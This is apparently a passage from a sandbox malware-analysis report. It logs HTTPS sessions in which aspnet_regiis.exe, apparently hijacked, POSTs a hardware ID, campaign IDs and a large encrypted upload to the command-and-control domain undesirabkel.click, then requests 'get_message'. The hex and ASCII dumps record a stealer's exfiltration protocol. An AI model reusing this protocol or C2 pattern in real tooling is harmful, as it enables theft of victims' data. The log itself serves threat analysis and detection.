2025-01-04 08:42:07 UTC	1133	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 08:42:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s7r78vg98ivls8u0tum375ckgg; expires=Wed, 30 Apr 2025 02:28:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WiFeEsz0NSL63BeOA1CFqrEtkAGj6iPXbnsKxxT3%2FLrl%2F%2FP6wYEV%2FNL6kVNiKG0YB8qZxDJy91XhW9kZBk5CBwWbgP5JKqfAy11Eru6X4mNno%2FvIR2HbCaAbBzZGrltm0qlEqNw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc9eef08e1a7ce8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1990&rtt_var=751&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9697&delivery_rate=1453459&cwnd=200&unsent_bytes=0&cid=d82c7caff3684dd0&ts=536&x=0"
2025-01-04 08:42:07 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 08:42:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49742	188.114.96.3	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 08:42:07 UTC	279	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=4C4512I00S3LU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20414 Host: undesirabkel.click
2025-01-04 08:42:07 UTC	15331	OUT	Data Raw: 2d 2d 34 43 34 35 31 32 49 30 30 53 33 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 32 30 32 42 41 34 33 32 39 41 34 43 38 46 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 34 43 34 35 31 32 49 30 30 53 33 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 43 34 35 31 32 49 30 30 53 33 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 69 63 72 72 69 66 6f 66 68 66 67 0d 0a 2d 2d 34 43 34 35 Data Ascii: --4C4512I00S3LUContent-Disposition: form-data; name="hwid"DF202BA4329A4C8FE1B71982A10B646A--4C4512I00S3LUContent-Disposition: form-data; name="pid"3--4C4512I00S3LUContent-Disposition: form-data; name="lid"LPnhqo--iicrrifofhfg--4C45
2025-01-04 08:42:07 UTC	5083	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: lrQMn 64F6(X&7~`aO
2025-01-04 08:42:08 UTC	1131	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 08:42:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qim4gpaf6uh1sa3sp6morlbk68; expires=Wed, 30 Apr 2025 02:28:47 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MHemQYMuaUZWPuOCLo%2Bjw%2BiG8rOewjS23bYkotuIW9mQw4ENqk5dTt82AAq05fvwK%2Bd3msSRdL2did4HvZPNVfTJiKcPtxIwqVsGCaoMGvcl5qwqnXdp40QTfzWqAGtumT6CBFo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc9eef7cd33427f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1703&rtt_var=656&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21373&delivery_rate=1645997&cwnd=239&unsent_bytes=0&cid=32eaf42728434add&ts=922&x=0"
2025-01-04 08:42:08 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 08:42:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49743	188.114.96.3	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 08:42:09 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=W9TUYLRPWIGHR58YBQ4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1275 Host: undesirabkel.click
2025-01-04 08:42:09 UTC	1275	OUT	Data Raw: 2d 2d 57 39 54 55 59 4c 52 50 57 49 47 48 52 35 38 59 42 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 32 30 32 42 41 34 33 32 39 41 34 43 38 46 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 57 39 54 55 59 4c 52 50 57 49 47 48 52 35 38 59 42 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 39 54 55 59 4c 52 50 57 49 47 48 52 35 38 59 42 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 69 Data Ascii: --W9TUYLRPWIGHR58YBQ4Content-Disposition: form-data; name="hwid"DF202BA4329A4C8FE1B71982A10B646A--W9TUYLRPWIGHR58YBQ4Content-Disposition: form-data; name="pid"1--W9TUYLRPWIGHR58YBQ4Content-Disposition: form-data; name="lid"LPnhqo--ii
2025-01-04 08:42:10 UTC	1128	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 08:42:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=plge5ikjf1pvc637siluic03m4; expires=Wed, 30 Apr 2025 02:28:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kglKDorqcYmwOZTpGBkGpCWj5dSMLZXex30OihbYEH8HxMAu0fMFqegk3OV%2Bq5nauw5a%2Bjp0ahvnyFJedAy2w3dvju879xxJ6FIULk2hCPM%2FsiwYGFF8s4bOzGTUbFi8SPjbhHw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc9ef035b6e0cc8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1491&rtt_var=568&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2195&delivery_rate=1958417&cwnd=230&unsent_bytes=0&cid=99cec7e00bffc1a5&ts=443&x=0"
2025-01-04 08:42:10 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 08:42:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49744	188.114.96.3	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 08:42:11 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=L4TX8WMB2QKP1MQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 587848 Host: undesirabkel.click
2025-01-04 08:42:11 UTC	15331	OUT	Data Raw: 2d 2d 4c 34 54 58 38 57 4d 42 32 51 4b 50 31 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 32 30 32 42 41 34 33 32 39 41 34 43 38 46 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 4c 34 54 58 38 57 4d 42 32 51 4b 50 31 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 34 54 58 38 57 4d 42 32 51 4b 50 31 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 69 63 72 72 69 66 6f 66 68 66 67 0d 0a Data Ascii: --L4TX8WMB2QKP1MQContent-Disposition: form-data; name="hwid"DF202BA4329A4C8FE1B71982A10B646A--L4TX8WMB2QKP1MQContent-Disposition: form-data; name="pid"1--L4TX8WMB2QKP1MQContent-Disposition: form-data; name="lid"LPnhqo--iicrrifofhfg
2025-01-04 08:42:11 UTC	15331	OUT	Data Raw: 6d a9 dc 68 ab 9a db 6a fe 83 b9 1e 87 6c ee fb 37 e4 05 58 20 12 c0 6e dc a6 a9 34 da a1 1d b0 62 ce 66 5f a5 5d 04 36 5a 51 2b fb a1 c7 a8 77 da 99 9d 4f 5c 62 55 90 5e 57 fd f6 ff 6d 30 42 2e d7 00 fd 43 2b 98 c1 81 18 13 6a 2e 1b 29 38 41 20 c2 34 ac 35 46 63 3d e2 59 79 14 4f 11 d4 e6 6e 4a e0 c1 48 78 8b 87 62 df 66 09 31 0f 4a 76 0b 00 9b c4 74 7b 37 1c 68 94 5b b8 62 82 8e 12 79 6e 5f 02 c9 2a c3 54 91 ed 22 0d 9a f7 c6 a7 94 90 d8 2f c6 2c a1 0e 49 ba c3 26 14 39 38 10 ff f2 f7 b8 32 77 42 33 8e 5a 69 26 a3 de 0f 4b 77 15 01 4b 17 ee 64 51 31 a6 f0 3c 66 8e 92 ba d5 e8 eb 2c c7 ae 73 20 6c 12 57 e4 aa 37 ea 4c 46 7c 6c a5 a9 64 66 06 16 16 5f d6 98 7a bb 04 bc f7 d0 b4 d0 fe 7c 60 f2 27 7a 61 83 10 60 f4 c0 3c b0 48 ce 1a 22 8f d4 d5 7c 4d fc ca Data Ascii: mhjl7X n4bf_]6ZQ+wO\bU^Wm0B.C+j.)8A 45Fc=YyOnJHxbf1Jvt{7h[byn_*T"/,I&982wB3Zi&KwKdQ1<f,s lW7LF\|ldf_z\|`'za`<H"\|M
2025-01-04 08:42:11 UTC	15331	OUT	Data Raw: 8f 14 db a6 5b c7 50 df 79 b3 e3 a8 b6 60 c7 5c 40 54 e3 3f 04 fd 6d eb 85 9a 4b b0 86 86 f4 c9 48 f9 91 ea 18 b0 94 42 23 0e 4b 0f a5 9b dd 95 39 0a af 19 87 9a c5 12 3d 71 64 cc 82 ce f5 c6 4f 7a 33 61 4a 6d 66 b0 7f 8b 51 d4 ca 77 6c 94 a7 f7 86 c7 00 c9 9e f1 53 f4 a4 b5 ab 4c 90 f7 1e f2 dc d0 d3 08 f2 4f 01 3b 4f 7e d5 6c a5 8d 0c 4f 8b f1 ed 21 e3 97 96 16 21 8e 02 f8 03 9c e7 92 db a7 5e 35 7f 91 63 c0 fe 5e f3 3d 3d 41 53 33 e7 22 33 e6 3e 6a 22 f1 fe a4 74 c7 ef 78 14 b1 f9 59 f5 cf f5 26 29 86 32 a7 ed 0e d1 2c f0 c7 5a e3 59 02 aa f6 2f db e6 af 8a f5 81 7b d9 c3 a9 4e ab a4 91 06 d4 d8 65 60 11 4d c5 cf e0 97 25 7f 15 11 cf 38 d9 cf c8 0f 29 a4 59 51 b3 e1 f8 c1 68 d6 03 0f 9a 0a aa c6 28 c2 fb aa e7 16 7e ec 72 7e ab 36 e8 95 0a 95 5e bc 90 Data Ascii: [Py`\@T?mKHB#K9=qdOz3aJmfQwlSLO;O~lO!!^5c^==AS3"3>j"txY&)2,ZY/{Ne`M%8)YQh(~r~6^
2025-01-04 08:42:11 UTC	15331	OUT	Data Raw: 7b 04 d8 42 d5 73 12 5e bd 00 77 52 07 ac df de 7c 75 71 83 69 b4 20 00 ee 06 94 1c fc d0 af c0 c1 41 ed 87 e1 14 5a 5f 6b 44 ba cf 43 c7 de ac cc ce dd b2 1e 96 16 6e 3d e3 cd 74 e0 3c 12 fc ae 1a 33 ea 3c f2 8f 52 25 7b 7d ea d2 1c d6 67 90 76 b3 75 c8 ec c1 61 ee dd bd 02 79 ba 08 ec 23 23 12 d7 f9 32 43 ed 83 dc 51 0e 8c 9d 06 d9 ba 43 fe d7 84 c1 c2 59 41 b0 1c c6 de 09 1c fa c4 ed 8c 21 82 7e 0e ab 66 9f af df 1b 70 16 33 5d 3f 20 e4 18 61 b9 11 b2 eb 21 98 d8 71 6c 08 c7 ba 98 f1 af dd 57 2a 87 49 5f 65 7d 26 75 f4 da 65 c7 3f 12 66 07 43 5f 13 c9 93 fe d2 b1 15 d1 07 50 c5 b3 fe b1 6e f2 06 3f f6 bc 35 c1 17 86 59 2b 83 64 b2 b6 f2 cd 7f 32 de 48 4b bc ca 7d 34 da cc 7a 16 d7 7e 47 ef 13 2a ef 84 7c 91 44 7b d2 17 75 55 45 bd f9 bb 00 88 c1 cd 61 Data Ascii: {Bs^wR\|uqi AZ_kDCn=t<3<R%{}gvuay##2CQCYA!~fp3]? a!qlWI_e}&ue?fC_Pn?5Y+d2HK}4z~G\|D{uUEa
2025-01-04 08:42:11 UTC	15331	OUT	Data Raw: eb 8e b8 bc a5 1f f5 26 31 b7 30 dc dd 8e 9e 69 51 d3 07 cf 66 7b 64 84 73 38 be 38 b8 e0 99 bf 7c 49 7f 47 14 f9 b1 2b aa d0 38 83 91 77 05 77 27 71 77 66 4f f4 52 1b 00 02 b2 50 18 2a 22 17 06 78 33 62 f4 7e 34 82 c8 64 38 41 cc 0d 27 1b f1 e3 7d fd af fd b2 10 f9 86 60 cf d6 ff 8a 90 ff d7 4d 19 c7 39 ca d3 1c 00 e5 9b 3c ec 3c 77 36 a7 9d 82 62 91 3f 3f 78 38 53 76 33 cf 87 48 a9 7d d8 9a 79 8d 17 1c 56 e7 83 11 20 e3 fa 9a 0e e9 bf f6 43 42 2c 1e cb 75 74 bb d5 6f 4e 6a 6b f3 f1 b7 07 75 56 25 67 82 f2 84 46 b1 e0 2c 64 cf 05 cc 56 11 5a 2e 37 64 20 65 7a 11 69 1f ce 1f 21 3c 75 cd 4f 0d 38 a3 57 ae 4d f4 56 22 b7 e4 e7 50 a0 4b 2f 62 68 7c 80 dc 7e 31 b3 31 42 68 ec f4 95 34 48 4a f0 08 9c 63 61 f4 19 49 57 14 48 ec 0f 3f 7a e1 04 a8 e6 1a bd c8 77 Data Ascii: &10iQf{ds88\|IG+8ww'qwfORP*"x3b~4d8A'}`M9<<w6b??x8Sv3H}yV CB,utoNjkuV%gF,dVZ.7d ezi!<uO8WMV"PK/bh\|~11Bh4HJcaIWH?zw
2025-01-04 08:42:11 UTC	15331	OUT	Data Raw: eb 01 72 92 0a 9f be ab db 9d 88 80 f6 b4 13 49 9e 35 b2 35 a4 3d a7 52 2e 08 d6 09 03 cd 6e 21 52 fc a6 d8 4f 58 a7 cb 0b 97 59 8f ec 8b bb d7 64 db ac 8c f7 ef c7 e7 be 81 25 9d 93 f7 80 91 31 80 97 e5 99 ee d6 80 e0 ca c4 ee df 4e 63 35 99 12 85 b9 c7 60 71 fe 4b a9 fb f1 c7 60 7f a5 52 5c 30 b2 14 a9 cd d2 0f ab 9c 39 3d 4d b6 c4 ce 1f ad 57 c4 36 31 b2 33 4b e3 01 8f 93 13 e7 30 cb 08 a1 79 18 73 fd d9 61 76 91 8a a7 a6 2f e7 04 fb 7b 20 45 f3 23 68 6b 0c ee 5a 6e aa 9e e1 d9 b7 64 fe d6 3c 09 89 47 50 b5 f7 e0 70 49 2a a6 0a e9 61 fa 2d a8 12 81 86 21 a5 80 99 d1 1f ae 5c c7 33 0e d9 21 19 a3 45 49 3a ca c1 8b 9c 22 26 f6 f8 30 a6 2b 86 8a df db 6f cb 19 87 6a 15 2a 9f 92 c6 f5 60 d0 6e 9d 16 8c df ea a4 59 e1 2b 16 e9 4f a2 22 40 c6 df e7 fe 12 61 Data Ascii: rI55=R.n!ROXYd%1Nc5`qK`R\09=MW613K0ysav/{ E#hkZnd<GPpIa-!\3!EI:"&0+oj`nY+O"@a
2025-01-04 08:42:11 UTC	15331	OUT	Data Raw: dd 10 c0 b7 7e f1 34 ef 51 18 7a 70 9d 42 09 7b 2c 51 1f f9 b2 69 77 50 65 07 8f 43 3c aa 41 34 87 e1 f6 6f 51 78 e4 62 b9 0e 9c ef bd 7c 11 36 43 00 29 9d ba dc 94 ac 9c f5 49 9b d1 0a 23 ce 4e 74 88 91 6a 4c be 84 94 63 03 24 2a e5 8f 40 ed 27 85 18 6c 7f bd 64 28 54 70 eb 75 3c cd 56 07 40 9c 84 cf 9c e5 be dc d0 f5 ef f6 09 d2 c0 b2 7a fa 31 3f 98 d3 87 0d 28 81 e0 43 48 0a c4 18 8e 12 01 8d 45 94 bd ba bd 1f 5c c8 25 4b ef df b5 7f 5d b5 7b 60 37 3c 34 00 63 0d 78 b7 9e f1 a8 d9 9c 00 40 2e 1b 2c 45 c9 3f 36 7a 77 e3 16 27 d0 e5 2a c5 6a 38 95 04 8a d2 86 67 9a f2 3e ea 98 90 d0 3c 37 04 bc 86 75 2c 3c 5c 66 3f 72 b1 0b 06 bd c6 45 48 8b 19 81 d1 a9 77 57 db f7 c6 a9 8f 64 c9 21 ee fa 58 52 33 82 5a 7f 88 f0 b4 f4 ca be e0 0d 58 55 cf 86 c0 b1 28 ca Data Ascii: ~4QzpB{,QiwPeC<A4oQxb\|6C)I#NtjLc$@'ld(Tpu<V@z1?(CHE\%K]{`7<4cx@.,E?6zw'j8g><7u,<\f?rEHwWd!XR3ZXU(
2025-01-04 08:42:11 UTC	15331	OUT	Data Raw: 7b d7 c6 60 f5 cd 70 41 de f9 3d 0f 03 da 2e 61 9e 9b 84 e5 54 04 dc 2a bc f1 e7 b9 c5 ee f0 f3 a7 81 39 a8 2d 7a f8 d5 c7 66 54 95 a6 98 70 40 bd 4f 17 18 fd da 1d b4 12 b0 88 5b d5 f9 3a 28 10 12 1e be 30 38 e4 83 60 43 3d 4a a5 c5 cb 6e 73 32 15 65 bc 1a 9f 8c c9 a2 86 b1 6e 4a ea cf cd aa f9 e9 18 0e d3 cd 78 f1 e2 14 73 ba e5 2e 02 18 9b a4 07 fd 58 bc be f5 ca 88 17 8d d4 0f 67 f7 97 7c cd ec d7 8f c5 1e a0 aa b0 c7 0e a7 9f fe c8 f4 78 1f d2 d1 06 dd de 4c fe 29 64 c9 9a 49 e6 2f 79 6f e2 9e 6a 7d 42 8d 7e ff f2 a3 e1 27 a0 a5 f2 f0 c6 3f 76 8f d3 f3 cf 09 b1 86 f7 40 db d9 bd 55 d3 7c 8a b2 1b 73 86 1b 32 b6 2b 76 1a 05 e6 8b ba 2f 3b 2f 3a ad ea c6 70 37 73 86 8a 12 58 5b 3a 42 64 57 d2 e1 aa 87 d5 9c 33 d0 2b ff f5 8d a1 90 2b e0 60 59 75 9b 37 Data Ascii: {`pA=.aT*9-zfTp@O[:(08`C=Jns2enJxs.Xg\|xL)dI/yoj}B~'?v@U\|s2+v/;/:p7sX[:BdW3++`Yu7
2025-01-04 08:42:11 UTC	15331	OUT	Data Raw: d5 17 ae a3 d8 d2 a0 f4 09 32 a5 c7 86 d8 f5 0a f5 5c e9 b7 1d 2b 9b f2 58 7c bc 53 18 44 6d 96 7c 0a b7 7b 37 97 c8 48 1c 13 9f d3 17 09 5d e3 38 4b 83 75 37 75 40 54 21 30 27 d6 b3 f6 da ba 09 48 08 20 64 4f 9f 65 9b f8 41 a5 77 b1 3e 4f d3 a5 6f 3b 58 66 38 65 1b 09 0b c3 36 c3 55 51 21 67 bf 55 5f 7e a0 14 ee b9 59 92 40 46 47 1b f0 c4 c4 5d 4c de 34 33 46 85 19 1b 21 72 d8 4b d5 29 98 46 bd 02 8b d0 a0 a7 ea 9b 8d da 87 99 4d 82 23 26 24 73 ed a6 e5 36 35 6d 55 46 2a 2f 7b 9e 4a c0 3c c4 16 48 87 ba 7f 4a 2e 48 d4 01 33 06 23 9c 0a a6 31 72 ee 00 d9 58 51 7f 4a cc 12 1d 59 86 11 17 7e a9 08 e3 36 db 21 3d b5 02 5b 48 a5 2f 2c 75 4d 26 d3 59 ef bd 26 63 0f b6 71 94 12 bf 7c 60 fd ee 90 98 10 da ef f7 a1 0e 40 4c 0b bf 18 f9 35 51 3b 09 4d 94 47 76 74 Data Ascii: 2\+X\|SDm\|{7H]8Ku7u@T!0'H dOeAw>Oo;Xf8e6UQ!gU_~Y@FG]L43F!rK)FM#&$s65mUF*/{J<HJ.H3#1rXQJY~6!=[H/,uM&Y&cq\|`@L5Q;MGvt
2025-01-04 08:42:11 UTC	15331	OUT	Data Raw: cf 55 1b 32 7d 38 b5 19 c7 7e be 5e 79 9e bd 7e 27 2d 6b 71 70 fe 7c c1 60 b0 fb 92 6f 44 4d ed f4 e8 c9 71 7d e6 4b d9 27 0a a3 01 7e a3 21 2a c2 7d 27 82 ea 23 9f 72 97 49 21 fa cc 08 4b 64 48 62 37 a3 6f 78 6d 27 8d e9 9b c1 89 38 e0 fa b6 b1 f6 7c c1 3b 86 7e 48 d9 29 f6 e0 a2 fb ad 12 73 d9 e3 26 5f 1a de df cd ba 35 63 58 10 80 cf eb 9c 36 c7 2c 7c b2 23 9f b7 c9 4d a8 79 2a 38 b4 d1 20 35 dc 67 d8 e0 86 5f 98 c7 b3 ee 91 64 fc ec 2b 2c 2d 82 dd fc 61 2d 93 95 3f 72 6a 27 88 1f fd 0c 51 89 0c 8d a2 1d 42 0d 7c e0 26 f4 17 fc 39 f8 9f fb 2c 36 5e 39 68 c2 e3 1d 2b 7f 9b 9c 86 91 90 99 34 ca 34 80 4e 7d 3f 67 32 c1 e2 1a ce dd 48 66 2f 2a 80 47 26 4f 77 87 88 2a c2 c9 6b 3f 01 c1 cd 61 d8 ec 6e 43 03 1a 4e 0c 36 1a ab 8e ee 2f c6 f8 71 95 ac 6b 4a 90 Data Ascii: U2}8~^y~'-kqp\|`oDMq}K'~!}'#rI!KdHb7oxm'8\|;~H)s&_5cX6,\|#My8 5g_d+,-a-?rj'QB\|&9,6^9h+44N}?g2Hf/G&Owk?anCN6/qkJ
2025-01-04 08:42:13 UTC	1137	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 08:42:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9rd5qrf1cctqr4ncvfoek1lhj3; expires=Wed, 30 Apr 2025 02:28:51 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eDIdyyWP4CzUbgDOerJdQ8SbJPF3%2BxF3%2F8r7twt7ps9db4m4VihqTeIzyhxE7XhJbFfE4cHmUKPr3hdo6K3QLfDXqrkdzWgMK5Afmbn8XRlXeHi22pZgpRXGcXFm%2FecR%2FYTKTew%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc9ef0c0ec50cc4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1492&rtt_var=566&sent=203&recv=605&lost=0&retrans=0&sent_bytes=2845&recv_bytes=590438&delivery_rate=1921052&cwnd=147&unsent_bytes=0&cid=2a9f79fd7815aab2&ts=2133&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49745	188.114.96.3	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 08:42:13 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 89 Host: undesirabkel.click
2025-01-04 08:42:13 UTC	89	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 69 69 63 72 72 69 66 6f 66 68 66 67 26 6a 3d 26 68 77 69 64 3d 44 46 32 30 32 42 41 34 33 32 39 41 34 43 38 46 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--iicrrifofhfg&j=&hwid=DF202BA4329A4C8FE1B71982A10B646A
2025-01-04 08:42:14 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 08:42:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3rl96v9e4np3fv4vg5drpcgq1e; expires=Wed, 30 Apr 2025 02:28:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: 